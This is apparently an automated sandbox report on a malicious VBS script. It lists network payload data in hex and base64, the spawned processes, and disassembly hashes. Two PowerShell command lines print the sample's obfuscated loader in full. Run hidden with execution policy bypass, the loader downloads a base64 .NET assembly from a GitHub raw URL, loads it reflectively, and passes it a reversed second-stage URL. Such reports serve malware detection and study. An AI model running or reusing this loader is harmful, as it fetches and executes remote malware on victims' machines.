                        2024-10-02 03:23:17 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                        Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                        2024-10-02 03:23:17 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                        Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                        2024-10-02 03:23:17 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                        Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                        2024-10-02 03:23:17 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                        Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                        2024-10-02 03:23:17 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                        Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                        2024-10-02 03:23:17 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                        Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:23:23:13
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
                        Imagebase:0x7ff74cb20000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:23:23:14
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x7ff63c0a0000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:23:23:14
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff704000000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:23:23:15
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
                        Imagebase:0x7ff63c0a0000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FFE166537B5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2444221385.00007FFE16650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16650000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffe16650000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e299623f713b4dffa0203e319fe819a063794d4d4339be70ff8e16bca9f68e6
                          • Instruction ID: 38fbe71a769cb222858aa8feaedf676e0ce473a8dca513baa405d61122bc47f8
                          • Opcode Fuzzy Hash: 6e299623f713b4dffa0203e319fe819a063794d4d4339be70ff8e16bca9f68e6
                          • Instruction Fuzzy Hash: 8501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E892CB46

                          Executed Functions

                          Function 00007FFE1671049A Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: \_H$r6?t
                          • API String ID: 0-4185842631
                          • Opcode ID: 42963d11d734c3fbbf4706868c30bf17da628e0c1c317f869316432a2ef00898
                          • Instruction ID: 4e88c71fe305867ae82cece6ba763f2c9bdf5f5f45f39247cb38ba384c611f6e
                          • Opcode Fuzzy Hash: 42963d11d734c3fbbf4706868c30bf17da628e0c1c317f869316432a2ef00898
                          • Instruction Fuzzy Hash: CD012B32B0ED194FF7B1816D14662B572E1FF98130F1802B7D84FD31A5ED1DA8158280
                          Function 00007FFE1671077C Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b75ab61965a96de43c9400203257bd81ac054cc2d28d4f9ce0e246eb3a50a81f
                          • Instruction ID: 1a92f553d675ad29bfdf92d1521836d885c5f03c5861f520d96027b9e85e0baf
                          • Opcode Fuzzy Hash: b75ab61965a96de43c9400203257bd81ac054cc2d28d4f9ce0e246eb3a50a81f
                          • Instruction Fuzzy Hash: 0D21D232B1DB994FEB55AB19A8123F977E0EF45334F0441FBE489835A2DB25B809C6C1
                          Function 00007FFE16717A93 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c21ebc95c0a814c3b100eea1edd04152cfee4310219d6356c0e1cf3081ce9da1
                          • Instruction ID: beb2c5957f18bda28cea324d00a5e9bf3ebb9e5088857146c5c10c0f48448b33
                          • Opcode Fuzzy Hash: c21ebc95c0a814c3b100eea1edd04152cfee4310219d6356c0e1cf3081ce9da1
                          • Instruction Fuzzy Hash: BC019222A1ED8A4BE7B6921D18242B596E2EF95235B6900FFC01CC71A2DD1DAC094340
                          Function 00007FFE16710917 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6f424dc7b72b4240efa0d2e23777565131aa3ba6278a34fd9866051d06626f4
                          • Instruction ID: f61541d498290e5aec5b5e962790513c990d4993f6c1ff8661e25a134fdae0fa
                          • Opcode Fuzzy Hash: f6f424dc7b72b4240efa0d2e23777565131aa3ba6278a34fd9866051d06626f4
                          • Instruction Fuzzy Hash: 1D118C2050D7C14FD30B9B3848657A47FE2AF4B214F0946EED089DF1F3DA599855C762
                          Function 00007FFE166463C5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424417173.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16640000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aa461c8b0cfdae193b1ec41de5010ef01dc4512bf3ff2cf0cf13bff39321e54
                          • Instruction ID: 361945cd808a3be4f8444b1cb8fc37df31cc12bfcc06ab6776deacc41fc3ed2a
                          • Opcode Fuzzy Hash: 1aa461c8b0cfdae193b1ec41de5010ef01dc4512bf3ff2cf0cf13bff39321e54
                          • Instruction Fuzzy Hash: 3201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661D636E892CB46
                          Function 00007FFE167107B7 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27360a1ba743a10862cf6777c8d5651b43269c194e19e26de5c2bbc60d66c590
                          • Instruction ID: a653f32eb90a412df0e810a3376e2a99ba9480bd9f01fa4ae4a16e5e0c2d6154
                          • Opcode Fuzzy Hash: 27360a1ba743a10862cf6777c8d5651b43269c194e19e26de5c2bbc60d66c590
                          • Instruction Fuzzy Hash: B9018F32A1CB488FDB549B09A8024A87BE0FB49720B0501EBE44993162CA25BC45CBC6
                          Function 00007FFE166481FC Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424417173.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16640000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94ebf330d3db4b06f59ce51f812181b8c53c1607ce02bd6ef58ad98f49fc243d
                          • Instruction ID: 057ade9c31d5dde659d8487d0f12398b763ddcdca4e5b13b6c5eec19dadcfe06
                          • Opcode Fuzzy Hash: 94ebf330d3db4b06f59ce51f812181b8c53c1607ce02bd6ef58ad98f49fc243d
                          • Instruction Fuzzy Hash: 59E0ED20B29D095FDA88B73850693BC66D2EF98311F8000BCE90EC33E3ED285C064745
                          Function 00007FFE16715EBB Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b802c85c77a9f64827024068d5665a3f9e33f0f8eb0c18a8e6533f81451174d1
                          • Instruction ID: f8e1bf606e2cf7c7630b294dac880c02f79c989f4df8cc967a27b69d1893a95c
                          • Opcode Fuzzy Hash: b802c85c77a9f64827024068d5665a3f9e33f0f8eb0c18a8e6533f81451174d1
                          • Instruction Fuzzy Hash: AFE09A22A0EBC80FE7A6DB2808281647BE1AB1222435840FFD099CB1A3D81C8C0A8701
                          Function 00007FFE16713445 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7beb153b7342c6c616b9045db1a3de6e43c9f68df30e13ce174f9919acbf4813
                          • Instruction ID: 3113533fae0695010ee6c5d5c6d85398cf463df543c6ef5c32b6fa227ca3aef2
                          • Opcode Fuzzy Hash: 7beb153b7342c6c616b9045db1a3de6e43c9f68df30e13ce174f9919acbf4813
                          • Instruction Fuzzy Hash: BDD01232A185188EDF44EB98A4416ECF7A1EB4C366F54007BD10DD2152D92954518790
                          Function 00007FFE16717B6A Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 898346499cc0d20690667877f30720d24cb20adbdefc32083d7a73f7888902a4
                          • Instruction ID: 58c0294f74d4a5b222c41f0eeaac48fa93365ee2ad0f4087ade866a9745fa6b0
                          • Opcode Fuzzy Hash: 898346499cc0d20690667877f30720d24cb20adbdefc32083d7a73f7888902a4
                          • Instruction Fuzzy Hash: 67D01730A15E0E8BA7E6A72C001927190D3EFC8A1276040B9801DC62A6ED38D8464300
                          Function 00007FFE167104D2 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a08f975b4e8fd76241015e4273f628f3c5ca8f10b2c42de20256bebbb978208
                          • Instruction ID: 6696ca3105f2f652b8bf211151539ced8fc981bcf9f21a8029493d9ac506a85f
                          • Opcode Fuzzy Hash: 7a08f975b4e8fd76241015e4273f628f3c5ca8f10b2c42de20256bebbb978208
                          • Instruction Fuzzy Hash: 2EC08011F15D17079556613C003D5F801C1BF945117554575440DD72E6DC18DC014340